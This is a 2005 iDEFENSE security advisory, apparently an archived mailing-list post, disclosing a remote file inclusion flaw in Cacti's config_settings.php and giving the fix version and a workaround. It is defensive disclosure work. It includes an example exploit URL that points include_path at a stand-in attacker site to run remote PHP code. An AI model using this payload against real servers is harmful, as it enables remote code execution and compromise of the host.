[VulnWatch] iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti config_settings.php Remote Code Execution Vulnerability

From: iDEFENSE Labs (labs-no-reply_at_idefense.com)
Date: 06/22/05

  • Next message: iDEFENSE Labs: "[VulnWatch] iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti Remote File Inclusion Vulnerability"
    Date: Wed, 22 Jun 2005 09:54:13 -0400
    To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>, <full-disclosure@lists.grok.org.uk>
    
    

    Multiple Vendor Cacti config_settings.php Remote Code Execution
    Vulnerability

    iDEFENSE Security Advisory 06.22.05
    www.idefense.com/application/poi/display?id=266&type=vulnerabilities
    June 22, 2005

    I. BACKGROUND

    Cacti is a round-robin database (RRD) tool that helps create graphs from

    database information and is available on multiple Linux distributions.

    II. DESCRIPTION

    Cacti contains an input validation error in the config_settings.php
    script which allows an attacker to include arbitrary PHP code from
    remote sites. This in effect allows arbitrary code execution with the
    privileges of the web server. The vulnerability specifically exists due
    to the script trusting a user supplied include_path variable. The
    following example demonstrates how this might be exploited:

    http://example.com/include/config_settings.php?config[include_path]=http
    ://attackersite.com/

    In this way the file "http://attackersite.com/config_arrays.php" will be

    included and executed on the vulnerable server with the privileges of
    the web server.

    III. ANALYSIS

    Successful exploitation of this vulnerability allows a remote attacker
    to gain shell access with the privileges of the web server. An attacker
    can then attempt to escalate privileges using local exploits, possibly
    allowing a full root compromise.

    IV. DETECTION

    iDEFENSE has confirmed the existence of this vulnerability on Cacti
    0.8.6c. Earlier versions are suspected vulnerable. The following vendors

    include susceptible Cacti packages within their respective operating
    system distributions:

            The Debian Project
            The FreeBSD Project
            Gentoo Foundation
            Novell Inc. (SuSE)

    V. WORKAROUND

    Require authentication to access the Cacti installation. Restrict access

    to web servers using Cacti to only trusted hosts.

    VI. VENDOR RESPONSE

    Cacti 0.8.6e has been released to address this vulnerability and is
    available for download at:

       http://www.cacti.net/downloads/cacti-0.8.6e.tar.gz
       or
       http://www.cacti.net/downloads/cacti-0.8.6e.zip

    Release notes for Cacti 0.8.6e can be found at:

       http://www.cacti.net/release_notes_0_8_6e.php

    VII. CVE INFORMATION

    The Common Vulnerabilities and Exposures (CVE) project has assigned the
    name CAN-2005-1526 to this issue. This is a candidate for inclusion in
    the CVE list (http://cve.mitre.org), which standardizes names for
    security problems.

    VIII. DISCLOSURE TIMELINE

    05/12/2005 Initial vendor notification
    05/15/2005 Initial vendor response
    06/22/2005 Coordinated public disclosure

    IX. CREDIT

    Maciej Piotr Falkiewicz is credited with this discovery.

    Get paid for vulnerability research
    http://www.idefense.com/poi/teams/vcp.jsp

    Free tools, research and upcoming events
    http://labs.idefense.com

    X. LEGAL NOTICES

    Copyright (c) 2005 iDEFENSE, Inc.

    Permission is granted for the redistribution of this alert
    electronically. It may not be edited in any way without the express
    written consent of iDEFENSE. If you wish to reprint the whole or any
    part of this alert in any other medium other than electronically, please
    email customerservice@idefense.com for permission.

    Disclaimer: The information in the advisory is believed to be accurate
    at the time of publishing based on currently available information. Use
    of the information constitutes acceptance for use in an AS IS condition.
    There are no warranties with regard to this information. Neither the
    author nor the publisher accepts any liability for any direct, indirect,
    or consequential loss or damage arising from use of, or reliance on,
    this information.


  • Next message: iDEFENSE Labs: "[VulnWatch] iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti Remote File Inclusion Vulnerability"

    Relevant Pages